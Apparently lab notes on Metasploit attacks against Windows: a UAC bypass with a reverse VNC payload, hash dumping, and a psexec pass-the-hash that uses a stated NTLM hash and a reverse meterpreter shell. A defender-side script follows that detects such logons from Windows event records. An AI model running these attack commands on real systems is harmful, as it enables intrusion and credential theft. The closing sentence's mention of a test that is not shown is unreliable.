Getting a graphical (VNC) payload
msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 5
msf exploit(bypassuac) > set payload windows/vncinject/reverse_tcp
msf exploit(bypassuac) > exploit
msf exploit(bypassuac) > set viewonly false
If you want to interact with the target host rather than only watch it, set viewonly to false.
Pass-the-hash
After obtaining SYSTEM privileges, use hashdump to retrieve the usernames and password hashes.
meterpreter > hashdump
Psexec module: pass-the-hash (log in to the target system using "username + password hash" instead of the cleartext password)
In this experiment, make sure UAC is turned off on the target host.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.80.33
msf exploit(psexec) > set smbuser a
msf exploit(psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost 192.168.80.163
msf exploit(psexec) > exploit
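Defender-side counterpart to the pass-the-hash section above, added here and not part of the original notes: a psexec-style logon with a stolen hash shows up on the target as a Windows Security event 4624 network logon (type 3) authenticated with NTLM, followed within seconds by a System event 7045 (a new service was installed). The event records below are constructed sample data with simplified field names, not real log exports.

```python
# Added example (not from the original notes): correlate the two Windows
# event records that a pass-the-hash logon through SMB/psexec typically
# leaves on the target host: a 4624 network logon (type 3) authenticated
# with NTLM, followed shortly by a 7045 "service was installed" record.
# All event records below are constructed sample data.
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:00", "id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "user": "a", "src_ip": "192.168.80.163"},
    {"time": "2024-01-01T10:00:02", "id": 7045,
     "service": "qwertyuiop", "image": "%SYSTEMROOT%\\qwertyuiop.exe"},
    # Benign: a Kerberos network logon with no service install afterwards.
    {"time": "2024-01-01T11:30:00", "id": 4624, "logon_type": 3,
     "auth_package": "Kerberos", "user": "backup", "src_ip": "192.168.80.10"},
    # Benign: an NTLM logon, but the next service install is an hour later.
    {"time": "2024-01-01T12:00:00", "id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "user": "svc", "src_ip": "192.168.80.20"},
    {"time": "2024-01-01T13:05:00", "id": 7045,
     "service": "Backup Agent", "image": "C:\\Program Files\\Backup\\agent.exe"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_pth_psexec(events, window_seconds=60):
    """Return (logon, service_install) pairs where an NTLM network logon
    (4624, type 3) is followed within window_seconds by a 7045 record.
    NTLM type-3 logons alone are common; the nearby 7045 is the signal."""
    events = sorted(events, key=_ts)
    hits = []
    for i, ev in enumerate(events):
        if ev["id"] != 4624 or ev["logon_type"] != 3:
            continue
        if ev["auth_package"].upper() != "NTLM":
            continue
        deadline = _ts(ev) + timedelta(seconds=window_seconds)
        for later in events[i + 1:]:
            if _ts(later) > deadline:
                break
            if later["id"] == 7045:
                hits.append((ev, later))
    return hits


if __name__ == "__main__":
    for logon, svc in find_pth_psexec(SAMPLE_EVENTS):
        print(f"suspect: NTLM logon by {logon['user']} from {logon['src_ip']} "
              f"then service {svc['service']!r} ({svc['image']}) at {svc['time']}")
```

The time window is the main tuning knob: widening it catches slower tooling but, as the second assertion in the test shows, also pairs unrelated logons with routine service installs.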